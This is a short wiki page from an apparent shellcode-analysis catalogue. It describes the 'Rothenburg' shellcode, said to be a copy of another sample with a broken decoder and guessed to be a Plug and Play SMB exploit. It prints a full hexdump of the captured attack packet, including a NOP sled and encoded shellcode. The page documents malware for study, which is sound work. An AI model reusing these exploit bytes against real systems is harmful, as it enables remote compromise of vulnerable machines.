[[csni:shellcodes:rothenburg]]
 
Trace: home » csni » shellcodes » rothenburg
Table of Contents

Rothenburg Shellcode

This shellcode is a duplicate of schoenborn.
The only difference is that the decoder is broken.

Shellcode

Seems like a last stage pnp exploit to me
size: 2196
file: csni:shellcodes:rothenburg:rothenburg.bin

raw

hexdump -C var/hexdumps/43332acb7308bf349664ed62641eacf5.bin 

00000000  00 00 08 90 ff 53 4d 42  25 00 00 00 00 18 07 c8  |.....SMB%.......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 08 78 04  |..............x.|
00000020  00 08 60 00 10 00 00 3c  08 00 00 00 01 00 00 00  |..`....<........|
00000030  00 00 00 00 00 00 00 00  00 54 00 3c 08 54 00 02  |.........T.<.T..|
00000040  00 26 00 00 40 4d 08 00  5c 00 50 00 49 00 50 00  |.&..@M..\.P.I.P.|
00000050  45 00 5c 00 00 00 40 00  05 00 00 03 10 00 00 00  |E.\...@.........|
00000060  3c 08 00 00 01 00 00 00  24 08 00 00 00 00 36 00  |<.......$.....6.|
00000070  11 00 00 00 00 00 00 00  11 00 00 00 52 00 4f 00  |............R.O.|
00000080  4f 00 54 00 5c 00 53 00  59 00 53 00 54 00 45 00  |O.T.\.S.Y.S.T.E.|
00000090  4d 00 5c 00 30 00 30 00  30 00 30 00 00 00 00 00  |M.\.0.0.0.0.....|
000000a0  ff ff 00 00 e0 07 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  c0 07 00 00 00 00 00 00  90 90 90 90 90 90 90 90  |................|
000000c0  eb 08 90 90 67 15 7a 76  eb 08 90 90 67 15 7a 76  |....g.zv....g.zv|
*
00000110  90 90 90 90 90 90 90 eb  08 90 90 48 4f 44 88 90  |...........HOD..|
00000120  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000130  2a ca 80 ea b3 da ed da  77 27 f7 58 82 70 10 1a  |*.......w'.X.p..|
00000140  f6 07 34 80 e8 ff e1 f7  e6 9c ec 79 f2 0f f8 cb  |..4........y....|
00000150  e5 96 8c 58 3e d2 8c 71  26 7d 7b 31 62 f7 e8 bf  |...X>..q&}{1b...|
00000160  55 ee 8c 6b 3a f7 ec 7d  91 c2 8c 35 f4 c7 c7 ad  |U..k:..}...5....|
00000170  b6 72 c7 40 1d 37 cd 39  1b 34 ec c0 21 a2 23 1c  |.r.@.7.9.4..!.#.|
00000180  6f 13 8c 6b 3e f7 ec 52  91 fa 4c bf 45 ea 06 df  |o..k>..R..L.E...|
00000190  19 da 8c bd 76 d2 1b 55  d9 c7 dc 50 91 b5 37 bf  |....v..U...P..7.|
000001a0  5a fa 8c 44 06 5b 8c 74  12 a8 6f ba 54 f8 eb 64  |Z..D.[.t..o.T..d|
000001b0  e5 20 61 67 7c 9e 34 06  72 81 74 06 45 a2 f8 e4  |. ag|.4.r.t.E...|
000001c0  72 3d ea c8 21 a6 f8 e2  45 7f e2 52 9b 1b 0f 36  |r=..!...E..R...6|
000001d0  4f 9c 05 cb ca 9e de 3d  ef 5b 50 cb cc a5 54 67  |O......=.[P...Tg|
000001e0  49 a5 44 67 59 a5 f8 e4  7c 9e 1b db 7c a5 8e d5  |I.DgY...|...|...|
000001f0  8f 9e a3 2e 6a 31 50 cb  cc 9c 17 65 4f 09 d7 5c  |....j1P....eO..\|
00000200  be 5b 29 dd 4d 09 d1 67  4f 09 d7 5c ff bf 81 7d  |.[).M..gO..\...}|
00000210  4d 09 d1 64 4e a2 52 cb  ca 65 6f d3 63 30 7e 63  |M..dN.R..eo.c0~c|
00000220  e5 20 52 cb ca 90 6d 50  7c 9e 64 59 93 13 6d 64  |. R...mP|.dY..md|
00000230  43 df cb bd fd 9c 43 bd  f8 c7 c7 c7 b0 08 45 19  |C.....C.......E.|
00000240  e4 b4 2b a7 97 8c 3f 9f  b1 5d 6f 46 e4 45 11 cb  |..+...?..]oF.E..|
00000250  6f b2 f8 e2 41 a1 55 65  4b a7 6d 35 4b a7 52 65  |o...A.UeK.m5K.Re|
00000260  e5 26 6f 99 c3 f3 c9 67  e5 20 6d cb e5 c1 f8 e4  |.&o....g. m.....|
00000270  91 a1 fb b7 de 92 f8 e2  48 09 d7 5c f5 38 e7 54  |........H..\.8.T|
00000280  49 09 d1 cb ca f6 07 34  90 90 90 90 90 90 90 90  |I......4........|
00000290  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000880  90 90 90 90 90 90 90 90  e0 07 00 00 04 00 00 00  |................|
00000890  00 00 00 00                                       |....|
00000894
 
csni/shellcodes/rothenburg.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki